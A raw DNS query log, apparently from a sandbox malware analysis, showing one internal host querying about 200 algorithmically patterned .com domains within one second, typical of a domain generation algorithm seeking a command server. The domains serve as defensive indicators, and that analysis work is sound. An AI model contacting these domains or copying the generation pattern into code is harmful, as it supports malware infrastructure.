Aug 23, 2024 18:47:43.068113089 CEST	192.168.2.4	1.1.1.1	0x708	Standard query (0)	lyryvur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.068502903 CEST	192.168.2.4	1.1.1.1	0x20a3	Standard query (0)	qegyhev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.068701029 CEST	192.168.2.4	1.1.1.1	0x90e2	Standard query (0)	purycul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.069247961 CEST	192.168.2.4	1.1.1.1	0xef9f	Standard query (0)	gacyroh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.069603920 CEST	192.168.2.4	1.1.1.1	0xcc63	Standard query (0)	lygyged.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.069782972 CEST	192.168.2.4	1.1.1.1	0x913a	Standard query (0)	vowycut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.069957018 CEST	192.168.2.4	1.1.1.1	0xe6de	Standard query (0)	qexyriq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.072442055 CEST	192.168.2.4	1.1.1.1	0x522f	Standard query (0)	pufygav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.086064100 CEST	192.168.2.4	1.1.1.1	0x98b8	Standard query (0)	gaqycyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.086263895 CEST	192.168.2.4	1.1.1.1	0xa98d	Standard query (0)	lyxywij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.086515903 CEST	192.168.2.4	1.1.1.1	0x9547	Standard query (0)	puzywuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.086822987 CEST	192.168.2.4	1.1.1.1	0xf26f	Standard query (0)	vofygaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.087775946 CEST	192.168.2.4	1.1.1.1	0x8bef	Standard query (0)	qeqyxyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.087819099 CEST	192.168.2.4	1.1.1.1	0x602c	Standard query (0)	gadyfob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088041067 CEST	192.168.2.4	1.1.1.1	0x5a5b	Standard query (0)	lymyxex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088180065 CEST	192.168.2.4	1.1.1.1	0x62de	Standard query (0)	volyquk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088318110 CEST	192.168.2.4	1.1.1.1	0xefd4	Standard query (0)	qedyfog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088363886 CEST	192.168.2.4	1.1.1.1	0xda3	Standard query (0)	galyquw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088527918 CEST	192.168.2.4	1.1.1.1	0xaa37	Standard query (0)	lysyfin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088671923 CEST	192.168.2.4	1.1.1.1	0x651d	Standard query (0)	pumyxep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088727951 CEST	192.168.2.4	1.1.1.1	0xfe37	Standard query (0)	vonyzac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088831902 CEST	192.168.2.4	1.1.1.1	0xe0b3	Standard query (0)	qegyqug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.349770069 CEST	192.168.2.4	1.1.1.1	0xc49b	Standard query (0)	qekyqyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.350606918 CEST	192.168.2.4	1.1.1.1	0x4ef3	Standard query (0)	pupydig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.351504087 CEST	192.168.2.4	1.1.1.1	0x4709	Standard query (0)	lykymyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.351603985 CEST	192.168.2.4	1.1.1.1	0x8a5e	Standard query (0)	vopydum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.352174997 CEST	192.168.2.4	1.1.1.1	0x5d4b	Standard query (0)	ganyzas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.352245092 CEST	192.168.2.4	1.1.1.1	0x370d	Standard query (0)	qebylov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.352871895 CEST	192.168.2.4	1.1.1.1	0x507e	Standard query (0)	pujymel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.352889061 CEST	192.168.2.4	1.1.1.1	0x2611	Standard query (0)	gatyduh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.353491068 CEST	192.168.2.4	1.1.1.1	0xc512	Standard query (0)	vojymet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.353511095 CEST	192.168.2.4	1.1.1.1	0xc6f5	Standard query (0)	lyvylod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.354042053 CEST	192.168.2.4	1.1.1.1	0xf7b	Standard query (0)	qetysuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.354324102 CEST	192.168.2.4	1.1.1.1	0x52dd	Standard query (0)	puvyliv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.354798079 CEST	192.168.2.4	1.1.1.1	0xfcae	Standard query (0)	lyrysyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.354798079 CEST	192.168.2.4	1.1.1.1	0xc7af	Standard query (0)	gahynaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.355376005 CEST	192.168.2.4	1.1.1.1	0xb6a8	Standard query (0)	vocykif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.355506897 CEST	192.168.2.4	1.1.1.1	0xc1cf	Standard query (0)	qegynap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.355917931 CEST	192.168.2.4	1.1.1.1	0x3172	Standard query (0)	purypyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.356435061 CEST	192.168.2.4	1.1.1.1	0xbfb6	Standard query (0)	gacykub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.356832027 CEST	192.168.2.4	1.1.1.1	0xdfa8	Standard query (0)	vowypek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.357229948 CEST	192.168.2.4	1.1.1.1	0xa56f	Standard query (0)	lygynox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.357836962 CEST	192.168.2.4	1.1.1.1	0x8d01	Standard query (0)	qexykug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.357867956 CEST	192.168.2.4	1.1.1.1	0xa668	Standard query (0)	pufybop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.358480930 CEST	192.168.2.4	1.1.1.1	0x8be7	Standard query (0)	lyxyjun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.358694077 CEST	192.168.2.4	1.1.1.1	0x2ee0	Standard query (0)	gaqypew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.358985901 CEST	192.168.2.4	1.1.1.1	0x7a41	Standard query (0)	vofybic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.359324932 CEST	192.168.2.4	1.1.1.1	0x9d46	Standard query (0)	puzyjyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.359921932 CEST	192.168.2.4	1.1.1.1	0x12ef	Standard query (0)	gadyvis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.360440016 CEST	192.168.2.4	1.1.1.1	0x9a1d	Standard query (0)	lymytar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.360950947 CEST	192.168.2.4	1.1.1.1	0x2530	Standard query (0)	volyjym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.361115932 CEST	192.168.2.4	1.1.1.1	0x7d1	Standard query (0)	qedyvuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.361392975 CEST	192.168.2.4	1.1.1.1	0xb760	Standard query (0)	pumytol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.361845970 CEST	192.168.2.4	1.1.1.1	0xe080	Standard query (0)	galyheh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.362179041 CEST	192.168.2.4	1.1.1.1	0x374f	Standard query (0)	lysyvud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.362559080 CEST	192.168.2.4	1.1.1.1	0x5c55	Standard query (0)	vonyrot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.362905025 CEST	192.168.2.4	1.1.1.1	0x816b	Standard query (0)	pupycuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.362972021 CEST	192.168.2.4	1.1.1.1	0x4e1c	Standard query (0)	qekyheq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.363672972 CEST	192.168.2.4	1.1.1.1	0x2d3e	Standard query (0)	lykygaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.363970995 CEST	192.168.2.4	1.1.1.1	0xcc8d	Standard query (0)	qebyrip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.364322901 CEST	192.168.2.4	1.1.1.1	0x505	Standard query (0)	vopycyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.364408016 CEST	192.168.2.4	1.1.1.1	0x714a	Standard query (0)	ganyriz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.365082979 CEST	192.168.2.4	1.1.1.1	0x1584	Standard query (0)	pujygaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.365082979 CEST	192.168.2.4	1.1.1.1	0x5013	Standard query (0)	gatycyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.365489960 CEST	192.168.2.4	1.1.1.1	0x9146	Standard query (0)	lyvywux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.365881920 CEST	192.168.2.4	1.1.1.1	0xa255	Standard query (0)	vojygok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.366345882 CEST	192.168.2.4	1.1.1.1	0xaece	Standard query (0)	gahyfow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.366555929 CEST	192.168.2.4	1.1.1.1	0xd04d	Standard query (0)	puvywup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.413058043 CEST	192.168.2.4	1.1.1.1	0xe17a	Standard query (0)	lyryxen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.414772034 CEST	192.168.2.4	1.1.1.1	0x5257	Standard query (0)	qeqytal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.414951086 CEST	192.168.2.4	1.1.1.1	0x7c78	Standard query (0)	qetyxeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.415096998 CEST	192.168.2.4	1.1.1.1	0xb64b	Standard query (0)	vocyquc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.415333986 CEST	192.168.2.4	1.1.1.1	0x5ba1	Standard query (0)	qegyfil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.415463924 CEST	192.168.2.4	1.1.1.1	0xc6db	Standard query (0)	puryxag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.415544987 CEST	192.168.2.4	1.1.1.1	0x3149	Standard query (0)	gacyqys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.415689945 CEST	192.168.2.4	1.1.1.1	0xea63	Standard query (0)	lygyfir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.416225910 CEST	192.168.2.4	1.1.1.1	0x2704	Standard query (0)	pufydul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.416538000 CEST	192.168.2.4	1.1.1.1	0xbdd5	Standard query (0)	qexyqyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.416853905 CEST	192.168.2.4	1.1.1.1	0x2f2e	Standard query (0)	vowyzam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.422352076 CEST	192.168.2.4	1.1.1.1	0x65f	Standard query (0)	lyxymed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.422550917 CEST	192.168.2.4	1.1.1.1	0x731d	Standard query (0)	gaqyzoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.422724962 CEST	192.168.2.4	1.1.1.1	0x9774	Standard query (0)	vofydut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.422894955 CEST	192.168.2.4	1.1.1.1	0x6374	Standard query (0)	qeqyloq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.423177958 CEST	192.168.2.4	1.1.1.1	0x89a0	Standard query (0)	gadyduz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.423365116 CEST	192.168.2.4	1.1.1.1	0x99d0	Standard query (0)	puzymev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.423906088 CEST	192.168.2.4	1.1.1.1	0x581b	Standard query (0)	lymylij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.760806084 CEST	192.168.2.4	1.1.1.1	0x5ef9	Standard query (0)	volymaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.761616945 CEST	192.168.2.4	1.1.1.1	0xf352	Standard query (0)	qedysyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.762439966 CEST	192.168.2.4	1.1.1.1	0xa1c4	Standard query (0)	pumyliq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.762994051 CEST	192.168.2.4	1.1.1.1	0x3bc9	Standard query (0)	galynab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.763539076 CEST	192.168.2.4	1.1.1.1	0xfe72	Standard query (0)	lysysyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.764175892 CEST	192.168.2.4	1.1.1.1	0x180f	Standard query (0)	vonykuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.764983892 CEST	192.168.2.4	1.1.1.1	0x6f59	Standard query (0)	qekynog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.765520096 CEST	192.168.2.4	1.1.1.1	0x2e18	Standard query (0)	pupypep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.766119003 CEST	192.168.2.4	1.1.1.1	0x5893	Standard query (0)	ganykuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.766649008 CEST	192.168.2.4	1.1.1.1	0x796	Standard query (0)	lykynon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.767214060 CEST	192.168.2.4	1.1.1.1	0x80ba	Standard query (0)	vopypec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.767750025 CEST	192.168.2.4	1.1.1.1	0xf9e5	Standard query (0)	qebykul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.768390894 CEST	192.168.2.4	1.1.1.1	0xc9b7	Standard query (0)	pujybig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.768914938 CEST	192.168.2.4	1.1.1.1	0x3cae	Standard query (0)	gatypas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.769582987 CEST	192.168.2.4	1.1.1.1	0xafa4	Standard query (0)	lyvyjyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.770107031 CEST	192.168.2.4	1.1.1.1	0x7ce6	Standard query (0)	vojybim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.770915031 CEST	192.168.2.4	1.1.1.1	0xf1d2	Standard query (0)	qetytav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.771476030 CEST	192.168.2.4	1.1.1.1	0x3ee5	Standard query (0)	puvyjyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.772171974 CEST	192.168.2.4	1.1.1.1	0xa0a6	Standard query (0)	gahyvuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.772661924 CEST	192.168.2.4	1.1.1.1	0x665e	Standard query (0)	lyrytod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.773370028 CEST	192.168.2.4	1.1.1.1	0x3c9e	Standard query (0)	vocyjet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.774012089 CEST	192.168.2.4	1.1.1.1	0xb400	Standard query (0)	qegyvuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.774730921 CEST	192.168.2.4	1.1.1.1	0x7baa	Standard query (0)	purytov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.775394917 CEST	192.168.2.4	1.1.1.1	0x192e	Standard query (0)	gacyhez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.776149988 CEST	192.168.2.4	1.1.1.1	0xf80b	Standard query (0)	lygyvuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.776676893 CEST	192.168.2.4	1.1.1.1	0xa20	Standard query (0)	vowyrif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.777573109 CEST	192.168.2.4	1.1.1.1	0x8365	Standard query (0)	qexyhap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.780278921 CEST	192.168.2.4	1.1.1.1	0x523e	Standard query (0)	pufycyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.783168077 CEST	192.168.2.4	1.1.1.1	0x62ce	Standard query (0)	gaqyrib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.783368111 CEST	192.168.2.4	1.1.1.1	0x4096	Standard query (0)	lyxygax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.783503056 CEST	192.168.2.4	1.1.1.1	0x3511	Standard query (0)	vofycyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.783869982 CEST	192.168.2.4	1.1.1.1	0x9881	Standard query (0)	qeqyrug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.784084082 CEST	192.168.2.4	1.1.1.1	0x9761	Standard query (0)	puzygop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.784375906 CEST	192.168.2.4	1.1.1.1	0x36ec	Standard query (0)	volygoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.784600973 CEST	192.168.2.4	1.1.1.1	0x2883	Standard query (0)	lymywun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.784919024 CEST	192.168.2.4	1.1.1.1	0x494c	Standard query (0)	gadycew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.785135984 CEST	192.168.2.4	1.1.1.1	0x1088	Standard query (0)	qedyxel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.785321951 CEST	192.168.2.4	1.1.1.1	0x3945	Standard query (0)	pumywug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.785453081 CEST	192.168.2.4	1.1.1.1	0x4ad1	Standard query (0)	galyfis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.785926104 CEST	192.168.2.4	1.1.1.1	0x3d0	Standard query (0)	lysyxar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.786149025 CEST	192.168.2.4	1.1.1.1	0x567b	Standard query (0)	vonyqym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.786401987 CEST	192.168.2.4	1.1.1.1	0xe211	Standard query (0)	qekyfiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.786586046 CEST	192.168.2.4	1.1.1.1	0x77e0	Standard query (0)	pupyxal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.786766052 CEST	192.168.2.4	1.1.1.1	0xe047	Standard query (0)	ganyqyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.786969900 CEST	192.168.2.4	1.1.1.1	0x168	Standard query (0)	lykyfud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.787180901 CEST	192.168.2.4	1.1.1.1	0x3957	Standard query (0)	qebyqeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.787477970 CEST	192.168.2.4	1.1.1.1	0x8025	Standard query (0)	pujyduv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.787965059 CEST	192.168.2.4	1.1.1.1	0x7a36	Standard query (0)	vopyzot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.788198948 CEST	192.168.2.4	1.1.1.1	0xf7b2	Standard query (0)	gatyzoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.788383007 CEST	192.168.2.4	1.1.1.1	0x4df1	Standard query (0)	lyvymej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.788568020 CEST	192.168.2.4	1.1.1.1	0x775e	Standard query (0)	vojyduf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.788777113 CEST	192.168.2.4	1.1.1.1	0x6b52	Standard query (0)	qetylip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.788914919 CEST	192.168.2.4	1.1.1.1	0xff70	Standard query (0)	puvymaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.789300919 CEST	192.168.2.4	1.1.1.1	0x1bce	Standard query (0)	gahydyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.789483070 CEST	192.168.2.4	1.1.1.1	0xaffe	Standard query (0)	lyrylix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.789727926 CEST	192.168.2.4	1.1.1.1	0x4e63	Standard query (0)	vocymak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.789952993 CEST	192.168.2.4	1.1.1.1	0xc7f0	Standard query (0)	qegysyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.790107012 CEST	192.168.2.4	1.1.1.1	0x7cf1	Standard query (0)	purylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.790288925 CEST	192.168.2.4	1.1.1.1	0xde3b	Standard query (0)	gacynow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.790488958 CEST	192.168.2.4	1.1.1.1	0xe41e	Standard query (0)	lygysen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.790663958 CEST	192.168.2.4	1.1.1.1	0x137f	Standard query (0)	vowykuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.790818930 CEST	192.168.2.4	1.1.1.1	0xdd55	Standard query (0)	qexynol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.791033030 CEST	192.168.2.4	1.1.1.1	0xaa7c	Standard query (0)	pufypeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.791580915 CEST	192.168.2.4	1.1.1.1	0x4539	Standard query (0)	gaqykus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.990935087 CEST	192.168.2.4	1.1.1.1	0x3791	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.991859913 CEST	192.168.2.4	1.1.1.1	0x3b45	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.993124008 CEST	192.168.2.4	1.1.1.1	0xad68	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.993768930 CEST	192.168.2.4	1.1.1.1	0xc502	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.994611025 CEST	192.168.2.4	1.1.1.1	0x9c76	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.996454000 CEST	192.168.2.4	1.1.1.1	0xa156	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.997402906 CEST	192.168.2.4	1.1.1.1	0x8de6	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.998368025 CEST	192.168.2.4	1.1.1.1	0x8a4a	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.999161959 CEST	192.168.2.4	1.1.1.1	0xd256	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.000152111 CEST	192.168.2.4	1.1.1.1	0xef15	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.002085924 CEST	192.168.2.4	1.1.1.1	0xb2b7	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.005590916 CEST	192.168.2.4	1.1.1.1	0x9c94	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.006455898 CEST	192.168.2.4	1.1.1.1	0xb193	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.007169962 CEST	192.168.2.4	1.1.1.1	0x3471	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.008037090 CEST	192.168.2.4	1.1.1.1	0xc36f	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.009016991 CEST	192.168.2.4	1.1.1.1	0xe823	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.009788990 CEST	192.168.2.4	1.1.1.1	0xf2ec	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.010381937 CEST	192.168.2.4	1.1.1.1	0xb131	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.011153936 CEST	192.168.2.4	1.1.1.1	0xdecb	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.011753082 CEST	192.168.2.4	1.1.1.1	0x5e94	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.014139891 CEST	192.168.2.4	1.1.1.1	0xe8ca	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.014770985 CEST	192.168.2.4	1.1.1.1	0xec34	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.015391111 CEST	192.168.2.4	1.1.1.1	0x3a80	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.015984058 CEST	192.168.2.4	1.1.1.1	0x1fe2	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.016774893 CEST	192.168.2.4	1.1.1.1	0xdf0d	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.017678022 CEST	192.168.2.4	1.1.1.1	0xc663	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.018395901 CEST	192.168.2.4	1.1.1.1	0xeb14	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.019260883 CEST	192.168.2.4	1.1.1.1	0x5b6d	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.041146040 CEST	192.168.2.4	1.1.1.1	0x794f	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.060003996 CEST	192.168.2.4	1.1.1.1	0x49ab	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.060467958 CEST	192.168.2.4	1.1.1.1	0xc189	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.060549974 CEST	192.168.2.4	1.1.1.1	0x964c	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.060830116 CEST	192.168.2.4	1.1.1.1	0xe658	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.061041117 CEST	192.168.2.4	1.1.1.1	0xd3be	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.064866066 CEST	192.168.2.4	1.1.1.1	0x9c8	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.065064907 CEST	192.168.2.4	1.1.1.1	0xadc6	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.065272093 CEST	192.168.2.4	1.1.1.1	0x9721	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.065653086 CEST	192.168.2.4	1.1.1.1	0xcd37	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
